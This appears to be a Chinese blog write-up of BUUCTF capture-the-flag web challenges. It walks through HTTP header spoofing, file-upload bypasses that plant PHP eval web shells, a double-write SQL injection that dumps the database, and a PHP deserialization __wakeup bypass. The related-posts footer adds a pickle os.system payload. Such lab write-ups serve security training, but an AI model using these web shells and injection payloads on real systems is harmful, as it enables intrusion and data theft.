第九周buuctf

最新推荐文章于 2024-10-12 20:07:22 发布
最新推荐文章于 2024-10-12 20:07:22 发布
阅读量878 收藏
点赞数
分类专栏: 笔记 文章标签: php 服务器 apache
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ing_end/article/details/127693552
版权

[极客大挑战 2019]Http

在这里插入图片描述
在这里插入图片描述
查看源代码,发现有一个Secret.php
在这里插入图片描述
进入这个访问该目录
在这里插入图片描述
提示:It doesn’t come from ‘https://www.Sycsecret.com’,也就是说这个页面得来自https://www.Sycsecret.com,添加referer即可

Referer头用于告诉web服务器,用户是从哪个页面找过来的

在这里插入图片描述

提示Please use “Syclover” browser:请使用“Syclover”浏览器
添加User-Agent:Syclover

User-Agent头用于告诉web服务器用户使用的浏览器和操作系统信息

在这里插入图片描述
提示No!!! you can only read this locally!!!:不! !您只能在本地阅读!!
添加X-Forwarded-For:127.0.0.1
在这里插入图片描述
拿到flag

[极客大挑战 2019]Upload

在这里插入图片描述
创建一个木马文件,以便后续用蚁剑链接
文件内容为

GIF89a
<script language="php">eval($_POST['a']);</script>

可绕过的后缀名检测:php,php3,php4,php5,phtml.pht
上传此文件,然后提示Not image!
在这里插入图片描述
在这里插入图片描述
用burpsuite抓包,根据提示,修改Content-Type的内容为 image/jpeg
URL地址为:/upload/a.phtml
连接密码为:a
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

[ACTF2020 新生赛]Upload

题目类型:文件上传,一句话木马
在这里插入图片描述
上传一句话木马<?php eval($_POST[a]);?>,修改后缀名为.jpg
在这里插入图片描述
burpsuite抓包,修改后缀名
在这里插入图片描述
修改为.phtml后显示上传成功
使用蚁剑连接,URL地址为:http://848a2803-bdd9-4890-be0e-526c8ce1433f.node4.buuoj.cn:81/./uplo4d/71056c0c9cb12f2b7d720156da9eabf1.phtml
在这里插入图片描述

[极客大挑战 2019]BabySQL

题目类型:SQL注入
在这里插入图片描述
输入用户名为admin,密码为1’
由报错信息可知存在SQL注入漏洞
在这里插入图片描述
试一下常规注入:/check.php?username=admin&password=1' union select 1#

在这里插入图片描述
根据报错信息猜测union 、select可能被过滤了,试一下双写绕过

/check.php?username=admin&password=1' ununionion seselectlect 1#

在这里插入图片描述
继续报错,URL编码试一下,然后试列数
payload:/check.php?username=admin&password=1' ununionion seselectlect 1,2,3%23
在这里插入图片描述
出现回显位置2和3

爆数据库:/check.php?username=admin&password=1' ununionion seselectlect 1,2,group_concat(schema_name)frfromom(infoorrmation_schema.schemata) %23
在这里插入图片描述
猜测flag在ctf里
爆表:/check.php?username=admin&password=1’ ununionion seselectlect 1,2, group_concat(table_name)frfromom(infoorrmation_schema.tables) whwhereere table_schema=“ctf” %23

在这里插入图片描述
`
查字段名:/check.php?username=admin&password=pwd ’ ununionion seselectlect 1,2,group_concat(column_name) frfromom (infoorrmation_schema.columns) whwhereere table_name=“Flag”%23
在这里插入图片描述

/check.php?username=admin&password=pwd ' ununionion seselectlect 1,2,group_concat(flag) frfromom(ctf.Flag)%23

在这里插入图片描述

[极客大挑战 2019]PHP

题目类型:序列化与反序列化

后台目录扫描工具:dirsearch

**魔术方法wakeup()绕过:**当成员属性数目大于实际数目时可绕过wakeup方法(CVE-2016-7124)

常见的备份文件后缀名:.git .svn .swp .~ .bak .bash_history .rar .zip .7z .txt .html .tar.gz .old .temp

private:private 声明的字段为私有字段,只在所声明的类中可见,在该类的子类和该类的对象实例中均不可见。因此私有字段的字段名在序列化时,类名和字段名前面都会加上\0的前缀。字符串长度也包括所加前缀的长度

public 属性被序列化的时候属性名还是原来的属性名,没有任何改变
protected 属性被序列化的时候属性名会变成%00*%00属性名,长度跟随属性名长度而改变
private 属性被序列化的时候属性名会变成%00类名%00属性名,长度跟随属性名长度而改变

在这里插入图片描述

这儿提示备份网站,用dirsearch扫一下后台目录
输入:python dirsearch.py -u http://9b76aef7-3183-4da4-a909-0f95ad5b6607.node4.buuoj.cn -e php
找到www.zip,访问一下
在这里插入图片描述
发现有flag.php目录

在这里插入图片描述

<?php
$flag = 'Syc{dog_dog_dog_dog}';
?>

无用信息
查看index.php源码,
在这里插入图片描述
发现包含class.php文件,采用get传参select,还有个php反序列化函数unserialize()

查看另一个文件class.php
在这里插入图片描述
查看源码
在这里插入图片描述
发现有输出flag的条件,接下来代码审计

<?php
include 'flag.php';
error_reporting(0);
class Name{
    private $username = 'nonono';
    private $password = 'yesyes';
	//创建对象时触发
    public function __construct($username,$password){
        $this->username = $username;
        $this->password = $password;
    }
	//使用unserialize时触发
    function __wakeup(){
        $this->username = 'guest';
    }
	//对象被销毁时触发
	//如果password=100,username=admin,在执行__destruct()的时候可以获得flag
    function __destruct(){
        if ($this->password != 100) {
            echo "</br>NO!!!hacker!!!</br>";
            echo "You name is: ";
            echo $this->username;echo "</br>";
            echo "You password is: ";
            echo $this->password;echo "</br>";
            die();
        }
        if ($this->username === 'admin') {
            global $flag;
            echo $flag;
        }else{
            echo "</br>hello my friend~~</br>sorry i can't give you the flag!";
            die();       
        }
    }
}
?>

通过反序列化来执行destruct函数,如果password=100,username=admin,可以获得flag

构造序列化

<?php

class Name{
    private $username = 'nonono';
    private $password = 'yesyes';

    public function __construct($username,$password){
        $this->username = $username;
        $this->password = $password;
    }
}
$a = new Name('admin', 100);
var_dump(serialize($a));

?>

在这里插入图片描述
接着执行反序列化,执行之前限制性wakeup函数,但是__wakeup函数会修改username的值,所以一个想办法绕过wakeup
绕过方法:当成员属性数目大于实际数目时可绕过wakeup方法(CVE-2016-7124)
用序列化加%00
private:属性被序列化的时候属性名会变成%00类名%00属性名,长度跟随属性名长度而改变。加%00的目的就是用于替代\0

O:4:"Name":3:{s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";i:100;}

构造payload:/?select=O:4:%22Name%22:3:{s:14:%22%00Name%00username%22;s:5:%22admin%22;s:14:%22%00Name%00password%22;i:100;}
在这里插入图片描述

BUUCTF刷题第二
Qianzshuo的博客
10-04 1079
第二wireshakeasycap另一个世界被劫持的神秘礼物数据包中的线索 wireshak 题目给了提示,将下载的pcap丢到wireshark里面,发现 查看 得到flag easycap 打开压缩包发现是一个pcap,丢到wireshark中,追踪第一个包,直接得到flag 另一个世界 用winhex查看,发现最后有一串二进制,将其转换成ascii 被劫持的神秘礼物 pcapng文件,用wireshark打开,查看http包,根据提示将账号密码连接起来,然后md5加密 数据包中的线索 用 wires
BUUCTF PWN-堆题总结 2021-09-27
m0_56897090的博客
09-27 2373
文章目录整体分析-2021-09-27新角度TcacheUAFFile结构体HourseOfForceUnlink经验新角度ciscn_2019_final_5分析EXPTCACHEhitcon_2018_children_tcache分析EXPUAFwustctf2020_easyfast分析EXPACTF_2019_babyheap分析EXPgyctf_2020_some_thing_interesting分析EXPbjdctf_2020_YDSneedGrirlfrien分析EXPciscn_2019
[极客大挑战 2019]Http
Braindance
03-04 229
查看源码在"氛围"这两个字上有隐藏的跳转Secret.php。进入以后页面显示 It doesn't come from 'https://www.Sycsecret.com' 提示页面不是来自这个网址,所以在HackBar上加上Referer:https://www.Sycsecret.com。之后又提示 Please use "Syclover" browser 加上User-Agent:Syclover。又提示 No!!! you can only read this locally!!! 加.
[极客大挑战 2019]Http(referer,User-Agent,XFF)
qq_45521281的博客
04-15 624
首先查看源代码,找到Secret.php 我们访问这个页面,显示上说这个页面必须来自"https://www.Sycsecret.com" 那就简单了,我们抓包, 又说必须使用Syclover浏览器,我们这里直接修改User-Agent头即可 又说No!!! you can only read this locally!!!,让我们伪造IP,在headers里面添加X-Forwarded-F...
[极客大挑战 2019]Http1解题思路
Megumiwind的博客
08-08 5228
1.打开Burp suite输入靶机的网址进行抓包,并把抓到的包发送到repeater(重发器)当中 在重发器中先点击发送查看一下结果的网页源代码。 在源码当中发现在一个html语句,并且是a标签的跳转语句,而跳转的地点是secret.php <a style="border:none;cursor:default;" onclick="return false" href="Secret.php">氛围</a> 2.既然是秘密页面,我们当然要进去看一下到底是.
CTF
qq_50025258的博客
02-01 639
[极客大挑战 2019]HTTP 查看源码,发现php文件 href="Secret.php" BurpSuite抓包 提示:it不是来自https://www.Sycsecret.com HTTP请求首部字段 Referer:http://www.Sycsecret.com` 作用:告知服务器请求的原始资源的URI 提示:请use"Syclover"浏览器 User-Agent:Syclover 作用:将创建请求的浏览器和用户代理名称等信息传达给服务器 提示:No!!! you can only r
BUUCTF百题刷题总结(一)
qwzf
09-14 2205
前言 最近打算开始刷BUU的Web题了,之前已经刷过一些,有的总结了,有的没有总结。总结过的这里只写之前总结的链接;没总结的,原因是当时感觉有点简单,这里简单写下考察知识点和解题思路。 新刷的Web题,会认真总结。本篇主要记录之前刷的题,BUUCTF刷题系列持续更新(SQL注入题单独记录)! 0x01 [HCTF 2018]WarmUp 考点:PHP代码审计+绕过自定义函数+文件包含 查看源代码,发现source.php,访问发现源码 <?php highlight_file(__FILE_
BUUCTF:[安洵杯 2019]不是文件上传 -- sql注入,PHP反序列化,sql16进制 单引号问题,
Zero_Adam的博客
04-04 586
目录:一、自己看着源码+WP复现 一、自己看着源码+WP复现 这写了个上传下载文件的网站后,再做这种 文件上传相关的题目时就轻松多了,,至少代码是干什么的能看明白了, 其实数据库的键值是什么也看了有一会儿才看出来,然后才在本地复现的。 create database pic_base create table images( title varchar(100), filename varchar(100), ext varchar(100), path varchar(200), attr varch
刷题情况+本学习内容[2021.02.07]
desdemona_syy的博客
02-07 981
刷题情况+本学习内容攻防世界(高手进阶区)刷题情况1.Broadcast2.sherlock3.flag_in_your_hand15.告诉你个秘密6.工业协议分析2 攻防世界(高手进阶区)刷题情况 1.Broadcast 这道题文件挺多的,但是那些文件好像都没什么用,重点还是下图画白框的地方。直接复制就过啦! 2.sherlock 这道题是一篇很长的文章,一开始并没有什么头绪,但是就是感觉它们单词里字母的大小写出现的很奇怪。比如这里: 我也参考了一些网上的wp,他们也是说突破口在这些大写字母上。 所
buuctf之文件上传漏洞(Pass1~15)_bucctf文件上传 1,网络安全面试简历
2301_79054215的博客
04-15 361
在指定字符串中从后面开始的第一次出现的位置,如果成功,则返回从该位置到字符串结尾的所有字符,如果失败,则返回 false。file_ext,所以相当于只去除前后空格和最后的一个点,还有一个点没被去除,就能利用Windows特性(自动去除文件后的带点)2.上传 .htaccess文件,在将要上传的php文件(或其他文件)后缀修改为txt(或其他在黑名单之外的),然后上传。(mime与文件后缀名作用类似,来告诉服务器文件的性质和格式,但比后缀名更详细,浏览器一般用mine而不用后缀名)
buuctf-web-[极客大挑战 2019]Http
weixin_46079186的博客
07-01 520
打开题目 题目http,应该是请求相关的,打开burp抓包,发现一个Secret.php文件 进入Secret.php文件 翻译一下说不是来着https://www.Sycsecret.com 这个时候就要用上RefererReferer:是header的一部分,当浏览器向web服务器发送请求的时候,一般会带上Referer,告诉服务器该网页是从哪个页面链接过来的,服务器因此可以获得一些信息用于处理。传入参数 Referer: https://www.Sycsecret.com` ..
有关http伪造绕过问题
qq_46229939的博客
05-06 826
详细查阅
BUUCTF [极客大挑战 2019]Http
weixin_44728681的博客
02-24 327
BUUCTF [极客大挑战 2019]Http Referer和x-forwarded-for
buuctf web [极客大挑战 2019]Http
m0_61903191的博客
09-18 373
X-Forwarded-For://如果提示只能由本地访问,这里内容必须改为127.0.0.1如果给了其他ip,那就改为其他IP地址.但是页面中有提示:It doesn't come from 'https://Sycsecret.buuoj.cn'所以,我们添加Referer:https://Sycsecret.buuoj.cn。User-Agent: //一般这个地方也需要改,看题目给的啥提示来改.Referer://这地方也需要改,看看题目给的提示,看给哪个url。检查了一下源码,有一个跳转页面。
BUUCTF WEB 极客大挑战 2019 Http
Ethan552525的博客
08-04 920
题目: 解题: 1:查看网页源代码 浏览页面,没有发现有用信息,查看源代码发现:Secret.php 2:尝试访问/Secret.php HTTP Referer Http Referer是header的一部分,当浏览器向web服务器发送请求的时候,一般会带上Referer,告诉服务器我是从哪个页面链接过来的,服务器借此可以获得一些信息用于处理。比如从我主页上链接到一个朋友那里,他的服务器就能够从HTTP Referer中统计出每天有多少用户点击我...
SWPU新生赛2021 Web部分WriteUp
mumuzi的博客
10-11 4624
第一波放题 gift_F12 直接F12之后搜flag WLLMCTF{We1c0me_t0_WLLMCTF_Th1s_1s_th3_G1ft} caidao 基操题,就不用菜刀,蚁剑直接连,密码wllm,地址就访问的地址,进去在根目录找到flag jicao 搜一下json就会了,我开始其实也不会…我开始get了一个{“json”:“wllm”} 。。。 get:?json={“x”:“wllm”} post:id=wllmNB Do_you_know_http 浏览器WLLM,改User-A
[极客大挑战 2019]Http1(BUCTF在线评测)
邓霖涛的博客
08-10 3301
得到flag{8d8ea9d6-86ae-4f8d-8f8e-e10d4b1bd9ef}you can only read this locally!浏览器修改不了Referer的值,换工具抓包工具(修改浏览器代理到抓包工具)搜索下看看有没有别的链接,如标签,发现有两处a标签,特别是第二处。按提示修改请求头X-Forwarded-For:localhost。鼠标右键发送到重发器修改Referer的值,测试请求。页面a标签包裹的"氛围"二字,可以点击了。F12调试该页面,跟踪该get网络请求。......
2024-10-12
weixin_41903258的博客
10-12 490
On Saturday, I still go to work, this is an unfriendly weekend that I spend。well, to be frank, I would like to learn history and philosophy rather than computer technologies and my leader let me learn quantum communication, Damn it。 math and physics are my
http协议 - 常见渗透测试姿势
HAKUNAMATATATTA的博客
11-03 380
http协议,常见渗透测试姿势
BUUCTF PYWebsite
最新发布
03-22
<think>好的,我现在需要帮助用户寻找与BUUCTF相关的PYWebsite资料或教程。首先,我得确认用户提到的“PYWebsite”具体指的是什么。在BUUCTF的题目中,可能存在一个名为“PYWebsite”的挑战题目,或者是与Python网站开发相关的题目。 接下来,我应该回忆一下BUUCTF平台上常见的题目类型。BUUCTF是一个CTF练习平台,涵盖Web、Reverse、Pwn、Crypto等类型。用户提到的引用中提到了Web相关的WP,比如[BJDCTF 2nd]简单注入和PHP escapeshellarg()+escapeshellcmd()的问题,这可能说明用户对Web题目感兴趣,特别是涉及Python的网站题目。 然后,我需要考虑用户可能的实际需求。他们可能在寻找某个特定题目的解题方法,或者想学习如何在BUUCTF上使用Python相关的Web技术。由于用户提到了“PYWebsite”,可能需要查找是否有该名称的题目,或者是否涉及Python网站框架(如Flask、Django)的题目。 接下来,我应该检查现有的引用内容。用户提供的引用1和2都是关于Web题目的WP,其中引用1提到了通过POST参数注入执行系统命令,引用2涉及PHP的函数漏洞。但用户的问题是关于PYWebsite的,这可能与Python相关,因此可能需要查找是否有相关的Python Web题目。 由于用户提供的引用中没有直接提到PYWebsite,我需要考虑其他途径。建议用户搜索BUUCTF平台上的题目列表,或者查看社区论坛、GitHub上的WP汇总,寻找包含“PYWebsite”关键词的题目。此外,可能需要指导用户如何利用现有资源查找资料,比如在GitHub上搜索“BUUCTF PYWebsite writeup”,或者在CTF相关的社区和博客中查找。 另外,用户可能需要了解如何使用Python解决Web题目,比如处理HTTP请求、解析参数、绕过过滤等。因此,除了具体题目的资料,提供一般性的Python Web渗透测试方法也是有帮助的。 最后,确保回答结构清晰,分步骤建议用户如何查找资料,并提供可能的资源链接和搜索关键词,同时提醒他们注意题目名称的正确性,避免因拼写错误导致搜索不到结果。</think>### BUUCTF PYWebsite相关资料及使用方法 根据你的需求,BUUCTF中关于“PYWebsite”的题目可能是涉及Python网站框架(如Flask/Django)或Python反序列化漏洞的题目。以下是分步解决方案: 1. **确认题目名称** - 建议在BUUCTF平台搜索栏输入`PYWebsite`或`Python Web`,确认是否存在名为`[PYWebsite]`或类似名称的题目。部分题目可能缩写为`PYWeb`或包含`Python`关键词。 2. **查找现有Writeup** - **GitHub搜索**:使用关键词`BUUCTF PYWebsite writeup site:github.com`,例如: ```python # 示例代码(用于说明搜索逻辑) import requests response = requests.get("https://api.github.com/search/repositories?q=BUUCTF+PYWebsite") ``` 近期热门题目通常会有详细解析[^1]。 - **CTF社区**:访问CTFHub、CSDN或知乎,搜索`BUUCTF PYWebsite 题解`,部分文章会分析代码审计或漏洞利用过程。 3. **Python Web渗透常用方法** - **Flask SSTI漏洞**:若题目使用Flask框架,尝试通过模板注入获取信息: ```python {{ config.items() }} # 查看配置信息 ``` - **反序列化攻击**:若涉及`pickle`模块,构造恶意序列化数据: ```python import pickle class Exploit: def __reduce__(self): return (os.system, ('cat /flag',)) payload = pickle.dumps(Exploit()) ``` 4. **参考资料推荐** - **官方文档**:BUUCTF题目描述中可能包含提示,仔细阅读题目附件代码中的注释或配置文件。 - **技术博客**:参考类似题目如`[[BJDCTF 2nd]简单注入]`的绕过方法,或`escapeshellarg+escapeshellcmd`组合漏洞的利用思路[^2]。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值